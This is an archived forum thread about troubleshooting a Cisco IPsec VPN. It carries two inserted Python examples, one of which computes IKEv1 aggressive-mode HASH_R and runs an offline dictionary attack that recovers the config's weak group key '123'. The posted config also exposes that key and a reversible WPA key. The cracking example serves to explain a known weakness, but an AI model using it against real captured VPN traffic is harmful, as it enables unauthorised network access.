
View Full Version : help! IPSEC VPN


gangaskan
12-01-08, 09:26 AM
I'm having issues with my VPN setup and I get booted by the client, it seems? (P.S. This is off a Cisco rtr.) This is my config, edited of course :)


!
!
version 12.4
no service pad
service tcp-keepalives-in
service tcp-keepalives-out
service timestamps debug datetime msec localtime show-timezone
service timestamps log datetime msec localtime show-timezone
service password-encryption
service sequence-numbers
!
hostname JellyJam
!
boot-start-marker
boot-end-marker
!
logging count
logging buffered 16384
no logging rate-limit
!
aaa new-model
!
!
aaa authentication login default local
aaa authentication login gangaskanvpn local
aaa authorization exec default local
aaa authorization network gangaskanvpn local
!
!
aaa session-id common
!
!
!
dot11 syslog
!
dot11 ssid gangaskan
vlan 1
authentication open
authentication key-management wpa
guest-mode
wpa-psk ascii 7 031753021C032442471303091243
!
no ip source-route
no ip dhcp use vrf connected
ip dhcp excluded-address 10.10.10.1
ip dhcp excluded-address 192.168.1.1 192.168.1.99
!
ip dhcp pool Internal-net
import all
network 192.168.1.0 255.255.255.0
default-router 192.168.1.1
domain-name neo.rr.com
lease 4
!
!
ip cef
ip auth-proxy max-nodata-conns 3
ip admission max-nodata-conns 3
no ip bootp server
ip domain name dyndns.ws
ip name-server 208.67.222.222
ip name-server 208.67.220.220
ip ddns update method test
!
!
parameter-map type protocol-info msn-servers
server name messenger.hotmail.com
server name gateway.messenger.hotmail.com
server name webmessenger.msn.com

parameter-map type protocol-info aol-servers
server name login.oscar.aol.com
server name toc.oscar.aol.com
server name oam-d09a.blue.aol.com

parameter-map type protocol-info yahoo-servers
server name scs.msg.yahoo.com
server name scsa.msg.yahoo.com
server name scsb.msg.yahoo.com
server name scsc.msg.yahoo.com
server name scsd.msg.yahoo.com
server name cs16.msg.dcn.yahoo.com
server name cs19.msg.dcn.yahoo.com
server name cs42.msg.dcn.yahoo.com
server name cs53.msg.dcn.yahoo.com
server name cs54.msg.dcn.yahoo.com
server name ads1.vip.scd.yahoo.com
server name radio1.launch.vip.dal.yahoo.com
server name in1.msg.vip.re2.yahoo.com
server name data1.my.vip.sc5.yahoo.com
server name address1.pim.vip.mud.yahoo.com
server name edit.messenger.yahoo.com
server name messenger.yahoo.com
server name http.pager.yahoo.com
server name privacy.yahoo.com
server name csa.yahoo.com
server name csb.yahoo.com
server name csc.yahoo.com
!
!
!
!
crypto isakmp policy 1
encr 3des
hash md5
authentication pre-share
group 5
!
crypto isakmp client configuration group VPN
key 123
domain gangaskan.dyndns.ws
pool ippool
!
!
crypto ipsec transform-set espresso esp-aes esp-sha-hmac
!
!
!
crypto dynamic-map dynamicmap 10
set transform-set espresso
reverse-route
!
!
crypto map clientmap client authentication list gangaskanvpn
crypto map clientmap isakmp authorization list gangaskanvpn
crypto map clientmap 10 ipsec-isakmp dynamic dynamicmap
!
crypto ctcp port 10000
archive
log config
hidekeys
!
!
ip tcp synwait-time 10
!
bridge irb
!
!
interface FastEthernet0
spanning-tree portfast
!
interface FastEthernet1
spanning-tree portfast
!
interface FastEthernet2
spanning-tree portfast
!
interface FastEthernet3
spanning-tree portfast
!
interface FastEthernet4
ip dhcp client update dns server none
ip ddns update hostname gangaskan.dyndns.ws
ip ddns update test
ip address dhcp
no ip redirects
no ip unreachables
no ip proxy-arp
ip nat outside
ip virtual-reassembly
ip tcp adjust-mss 1460
duplex auto
speed auto
no cdp enable
crypto map clientmap
!
!
interface Dot11Radio0
no ip address
no dot11 extension aironet
!
encryption vlan 1 mode ciphers tkip
!
ssid gangaskan
!
speed basic-1.0 basic-2.0 basic-5.5 6.0 9.0 basic-11.0 12.0 18.0 24.0 36.0 48.0 54.0
station-role root
no cdp enable
!
interface Dot11Radio0.1
encapsulation dot1Q 1 native
no cdp enable
bridge-group 1
bridge-group 1 subscriber-loop-control
bridge-group 1 spanning-disabled
bridge-group 1 block-unknown-source
no bridge-group 1 source-learning
no bridge-group 1 unicast-flooding
!
interface Vlan1
description Internal Network
ip address 10.10.10.1 255.255.255.248
ip nat inside
ip virtual-reassembly
ip tcp adjust-mss 1452
bridge-group 1
bridge-group 1 spanning-disabled
!
interface BVI1
description Bridge to Internal Network
ip address 192.168.1.1 255.255.255.0
ip directed-broadcast
ip nat inside
ip virtual-reassembly
!
ip local pool ippool 192.168.1.60 192.168.1.70
ip forward-protocol nd
ip route 0.0.0.0 0.0.0.0 dhcp
ip flow-top-talkers
top 5
sort-by bytes
!
!
!
logging facility local6
logging source-interface Dot11Radio0
logging 192.168.1.50
no cdp run
!
control-plane
!
bridge 1 route ip
banner exec ^C-----------------------------------------------------------------------

Gangaskan's Router, Unauthorized access must disconnect now!

-----------------------------------------------------------------------
^C
banner login ^C
-----------------------------------------------------------------------


Gangaskan's Router, Unauthorized access must disconnect now.


-----------------------------------------------------------------------
^C
!
line con 0
logging synchronous level all
no modem enable
transport output telnet
line aux 0
transport output telnet
line vty 0 4
logging synchronous level all
transport input ssh
!
scheduler max-task-time 5000
scheduler allocate 4000 1000
scheduler interval 500
sntp server 98.172.32.171
end



In terms of dynamic ISAKMP it looks like I have this set up the right way; however, it doesn't look like it. When I connect, I get the error

%CRYPTO-6-IKMP_MODE_FAILURE: Processing of Aggressive mode failed with peer

How do I either turn off aggressive mode on the VPN server or client?

Edit: or is it best practice to keep aggressive mode on with the VPN server? Or what do I need in order to set this up right? I know I'm missing something. PS: I'm using group auth with the Cisco VPN client.

dark_15
12-01-08, 09:45 PM
I'm not 100% familiar with the Cisco VPN client, but I do know you'll need to have Aggressive Mode enabled on both the VPN Server and Client. An aggressive mode VPN is necessary because the VPN Server does not know where the VPN Client is. The Aggressive Mode tunnel sends out the two peer IDs unencrypted, but overall should not compromise the security of the VPN tunnel.

Also, take a look here: http://www.velocityreviews.com/forums/showpost.php?p=185062&postcount=2. This should help you out. Good hunting!
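What aggressive mode actually puts on the wire, as an added example that is not part of this thread: in IKEv1 aggressive mode the responder's authentication hash HASH_R goes out unencrypted in message 2, and with pre-shared-key authentication it is a keyed hash (RFC 2409 section 5.4) over fields that are all visible to anyone watching the exchange. The Python below implements that derivation, plays the router's side with constructed sample values (the cookies, nonces, Diffie-Hellman public values and SA payload are constructed here, not captured from any real session), and then runs the offline dictionary check that tools such as ike-scan's psk-crack perform against the resulting HASH_R. With the group key from the posted config (`key 123`) the key falls out of a four-word list; with a long random group key the same list fails. The logged IKMP_MODE_FAILURE in the first post is a negotiation failure (the thread later traces it to a proposal mismatch), not a security event; this example is about the separate question in the edit, whether aggressive mode should stay on. The practical answer for a group pre-shared key is that it can stay on, because the Cisco VPN client needs it, but the group key must be treated as a password that can be attacked offline and chosen accordingly.

```python
"""
IKEv1 aggressive mode with a pre-shared group key: what a passive observer gets.

Added example, not code from the thread or from Cisco. All field values are
constructed sample data, not real traffic.
"""
import hashlib
import hmac
from dataclasses import dataclass
from typing import Iterable, Optional


@dataclass(frozen=True)
class AggressiveModeExchange:
    """Everything a passive observer sees in aggressive mode messages 1 and 2.

    Only HASH_R depends on the pre-shared key; every other field travels in
    the clear, which is what makes the offline test below possible.
    """
    cky_i: bytes    # initiator cookie, ISAKMP header
    cky_r: bytes    # responder cookie, ISAKMP header
    g_xi: bytes     # initiator Diffie-Hellman public value, KE payload
    g_xr: bytes     # responder Diffie-Hellman public value, KE payload
    ni_b: bytes     # initiator nonce payload body
    nr_b: bytes     # responder nonce payload body
    sai_b: bytes    # initiator SA payload body (the proposal list)
    idir_b: bytes   # responder ID payload body
    hash_r: bytes   # HASH_R as sent by the responder, unencrypted
    hashname: str = "md5"   # "hash md5" in the posted isakmp policy


def compute_hash_r(psk: bytes, x: AggressiveModeExchange) -> bytes:
    """RFC 2409 section 5.4, pre-shared key authentication:
         SKEYID = prf(psk, Ni_b | Nr_b)
         HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b)
       where prf is HMAC with the negotiated hash."""
    prf = getattr(hashlib, x.hashname)
    skeyid = hmac.new(psk, x.ni_b + x.nr_b, prf).digest()
    msg = x.g_xr + x.g_xi + x.cky_r + x.cky_i + x.sai_b + x.idir_b
    return hmac.new(skeyid, msg, prf).digest()


def _sample(label: str, n: int) -> bytes:
    """Deterministic constructed stand-in for a captured field (not real traffic)."""
    return hashlib.sha256(label.encode()).digest()[:n]


def responder_exchange(psk: bytes, idir: bytes = b"VPN",
                       hashname: str = "md5") -> AggressiveModeExchange:
    """Play the router's role: build a constructed exchange and compute HASH_R
    with the real group key, exactly as the responder does before sending it."""
    fields = dict(
        cky_i=_sample("cky_i", 8), cky_r=_sample("cky_r", 8),
        g_xi=_sample("g_xi", 192), g_xr=_sample("g_xr", 192),   # 1536-bit group 5
        ni_b=_sample("ni", 20), nr_b=_sample("nr", 20),
        sai_b=_sample("sa", 56), idir_b=idir, hashname=hashname,
    )
    x = AggressiveModeExchange(hash_r=b"", **fields)
    return AggressiveModeExchange(hash_r=compute_hash_r(psk, x), **fields)


def crack_psk(x: AggressiveModeExchange,
              candidates: Iterable[bytes]) -> Optional[bytes]:
    """Offline dictionary test against the observed HASH_R: recompute it for
    each candidate key and compare. Returns the matching key or None."""
    for cand in candidates:
        if hmac.compare_digest(compute_hash_r(cand, x), x.hash_r):
            return cand
    return None


if __name__ == "__main__":
    wordlist = [b"cisco", b"password", b"123", b"vpn"]
    weak = responder_exchange(b"123")          # the group key in the posted config
    print("weak key recovered:", crack_psk(weak, wordlist))       # b'123'
    strong = responder_exchange(_sample("random-group-key", 32))
    print("strong key recovered:", crack_psk(strong, wordlist))   # None
```

Nothing in the loop needs the router or the client online: once messages 1 and 2 have been captured, guessing is limited only by the attacker's hardware, which is why the group key and not the mode is the thing to fix.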

gangaskan
12-02-08, 07:05 AM
I'm not 100% familiar with the Cisco VPN client, but I do know you'll need to have Aggressive Mode enabled on both the VPN Server and Client. An aggressive mode VPN is necessary because the VPN Server does not know where the VPN Client is. The Aggressive Mode tunnel sends out the two peer IDs unencrypted, but overall should not compromise the security of the VPN tunnel.

Also, take a look here: http://www.velocityreviews.com/forums/showpost.php?p=185062&postcount=2. This should help you out. Good hunting!

I'll check that post out, thanks dark :)

Also, I had my teacher look at it; my config was OK, but my client was trying to auth with DES, not 3DES or AES.

Got it to work, but nothing is being routed through the tunnel, so I have to look at that.

ppe1700
12-03-08, 03:16 AM
ahem... COUGH ****lenizzle1

ppe1700
12-03-08, 03:26 AM
I'll check that post out, thanks dark :)

Also, I had my teacher look at it; my config was OK, but my client was trying to auth with DES, not 3DES or AES.

Got it to work, but nothing is being routed through the tunnel, so I have to look at that.

You are missing your NAT statements.
You need to NAT-exempt the inside network to the inside network.

I do my VPN setups using ASDM (or SDM in your case).
I've configured an IPsec VPN once manually, and that was on a course. I'll be studying for that exam in January.

Also, if you use split tunneling, your client will only send traffic destined for the other network over the VPN tunnel. That way, you can access the internet locally.
If you didn't do that, then all traffic, including internet, will be downloaded at home or wherever the Cisco router is, and then uploaded to you (the client), and vice versa.

gangaskan
12-03-08, 06:58 AM
You are missing your NAT statements.
You need to NAT-exempt the inside network to the inside network.

I do my VPN setups using ASDM (or SDM in your case).
I've configured an IPsec VPN once manually, and that was on a course. I'll be studying for that exam in January.

Also, if you use split tunneling, your client will only send traffic destined for the other network over the VPN tunnel. That way, you can access the internet locally.
If you didn't do that, then all traffic, including internet, will be downloaded at home or wherever the Cisco router is, and then uploaded to you (the client), and vice versa.

Erm, how do I NAT-exempt the inside VPN traffic? This is the first time I've set up a tunnel, and it's been forever since my CCNA stuff :P

I have an updated config; I changed some things around, but I'd prefer to stay command line ;) The SDM just makes garbage in the config, I had to pull a lot of crap out.

ppe1700
12-03-08, 07:17 AM
The SDM just makes garbage in the config, I had to pull a lot of crap out.

Yeah, you're right about that.

Gimme a little while, I have a 2811 here. I don't know the commands off the top of my head.

An ASA on ASDM would use this:

access-list inside_nat0_outbound remark no nat for vpn
access-list inside_nat0_outbound extended permit ip 192.168.1.0 255.255.255.0 192.168.1.0 255.255.255.0
nat (inside) 0 access-list inside_nat0_outbound


But I'm pretty sure you can just use:
nat (inside) 0 192.168.1.0 255.255.255.0 192.168.1.0 255.255.255.0

However, routers use wildcard masks instead of subnet masks,

so yours might be:
ip nat (*inside int name*) 0 192.168.1.0 0.0.0.255 192.168.1.0 0.0.0.255

Try typing it in and pressing ? to list the available options after each word. :)
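Why the exemption matters on an IOS router, as an added example that is not from the thread or from Cisco: for packets going from an inside interface to the outside interface, IOS applies `ip nat inside source` before the crypto map (Cisco's published NAT order of operations), so a LAN packet addressed to a VPN client that is not exempted from NAT reaches the crypto map with its source already rewritten to the WAN address, no longer matches the negotiated proxy identity, and leaves in the clear. The Python below is a simplified model of that path: it parses IOS-style extended ACL entries with wildcard masks (the point ppe1700 makes above about wildcard versus subnet masks), evaluates them first-match, and runs the same LAN-to-client packet through a NAT ACL with and without the deny entry. The WAN address 203.0.113.10 and the internet host 198.51.100.7 are constructed; the LAN, the pool address 192.168.1.65 (from `ip local pool ippool 192.168.1.60 192.168.1.70`) and the split-tunnel proxy identity follow the posted config. The corresponding IOS commands, stated here as standard syntax rather than taken from the thread, would be an extended ACL with the deny line applied by `ip nat inside source list NAT-ACL interface FastEthernet4 overload` (the posted config, as edited, contains no `ip nat inside source` statement at all), plus an `acl` line under `crypto isakmp client configuration group VPN` naming the split-tunnel ACL. The pool sitting inside the LAN subnet works because `reverse-route` installs a host route for the connected client; the NAT exemption is still required.

```python
"""
Why VPN-client traffic needs a NAT exemption on an IOS router.

Added example, not from the thread. Simplified model of the inside-to-outside
path: 'ip nat inside source' is applied before the crypto map, so an
un-exempted packet is translated before the proxy identity is checked.
"""
import ipaddress
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass(frozen=True)
class AclEntry:
    action: str     # "permit" or "deny"
    src: int        # source base address as an int
    src_wild: int   # wildcard mask: bits set to 1 are "don't care"
    dst: int
    dst_wild: int


def _addr(s: str) -> int:
    return int(ipaddress.IPv4Address(s))


def _parse_target(tokens: List[str], i: int) -> Tuple[int, int, int]:
    """Parse one IOS address spec at tokens[i]:
       'any' | 'host A.B.C.D' | 'A.B.C.D W.W.W.W' -> (base, wildcard, next index)."""
    t = tokens[i]
    if t == "any":
        return 0, 0xFFFFFFFF, i + 1
    if t == "host":
        return _addr(tokens[i + 1]), 0, i + 2
    return _addr(t), _addr(tokens[i + 1]), i + 2


def parse_acl(text: str) -> List[AclEntry]:
    """Parse extended-ACL lines such as
       'deny ip 192.168.1.0 0.0.0.255 192.168.1.0 0.0.0.255'.
    Only the 'ip' protocol keyword is modelled; ports are not."""
    entries = []
    for line in text.strip().splitlines():
        tokens = line.split()
        if not tokens or tokens[0] not in ("permit", "deny"):
            continue
        if tokens[1] != "ip":
            raise ValueError("only 'ip' entries are modelled: " + line)
        src, src_wild, i = _parse_target(tokens, 2)
        dst, dst_wild, _ = _parse_target(tokens, i)
        entries.append(AclEntry(tokens[0], src, src_wild, dst, dst_wild))
    return entries


def _wild_match(addr: int, base: int, wild: int) -> bool:
    # A wildcard mask is the inverse of a subnet mask: 1 bits are ignored.
    return ((addr ^ base) & ~wild & 0xFFFFFFFF) == 0


def acl_lookup(acl: List[AclEntry], src: str, dst: str) -> Optional[str]:
    """First-match evaluation; None is the implicit deny at the end of the list."""
    s, d = _addr(src), _addr(dst)
    for e in acl:
        if _wild_match(s, e.src, e.src_wild) and _wild_match(d, e.dst, e.dst_wild):
            return e.action
    return None


def forward(src: str, dst: str, nat_acl: List[AclEntry],
            crypto_acl: List[AclEntry], outside_ip: str) -> Tuple[str, str]:
    """Inside-to-outside path: PAT to outside_ip first, then the crypto map.
    Returns (disposition, source address as the packet leaves the router)."""
    if acl_lookup(nat_acl, src, dst) == "permit":
        src = outside_ip                # translated before crypto sees it
    if acl_lookup(crypto_acl, src, dst) == "permit":
        return "encrypted", src
    return "cleartext", src


OUTSIDE_IP = "203.0.113.10"             # constructed stand-in for the DHCP WAN address
LAN_HOST, VPN_CLIENT, INTERNET_HOST = "192.168.1.50", "192.168.1.65", "198.51.100.7"

# Proxy identity negotiated for a split-tunnel client: LAN <-> the client's pool address.
CRYPTO_ACL = parse_acl("permit ip 192.168.1.0 0.0.0.255 host 192.168.1.65")

# NAT ACL as usually first written: translate everything that leaves the LAN.
NAT_ACL_BROKEN = parse_acl("permit ip 192.168.1.0 0.0.0.255 any")

# NAT ACL with the exemption: LAN-to-LAN (which covers the pool) is never translated.
NAT_ACL_FIXED = parse_acl("""
deny   ip 192.168.1.0 0.0.0.255 192.168.1.0 0.0.0.255
permit ip 192.168.1.0 0.0.0.255 any
""")

if __name__ == "__main__":
    for label, nat in (("without exemption", NAT_ACL_BROKEN), ("with exemption", NAT_ACL_FIXED)):
        print(label, "LAN->client:", forward(LAN_HOST, VPN_CLIENT, nat, CRYPTO_ACL, OUTSIDE_IP))
        print(label, "LAN->internet:", forward(LAN_HOST, INTERNET_HOST, nat, CRYPTO_ACL, OUTSIDE_IP))
```

The deny entry has to come before the permit, because evaluation stops at the first match; put it after and the packet is translated exactly as before.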

ppe1700
12-03-08, 07:20 AM
Remember, when you use the VPN you appear on the inside of the network, but you are really on the outside.
This is why you cannot TFTP the config off over a VPN*, because what happens is the firewall/router gets confused on how to send the traffic, and sources the config from the outside interface.

*If you want to TFTP the config off, you need to finish the command line by adding :int-inside or something like that, to source it from the inside interface :) That way it gets tunneled.

gangaskan
12-03-08, 07:24 AM
I think I figured it out, perhaps; I don't have time to test, but I will at lunch!


Followed a Cisco guide here (http://www.cisco.com/en/US/tech/tk583/tk372/technologies_configuration_example09186a00800949db.shtml), so hope that works!

ppe1700
12-03-08, 08:20 AM
Schweet! I was right about the NAT then, except my config was way off! lol
Sorry.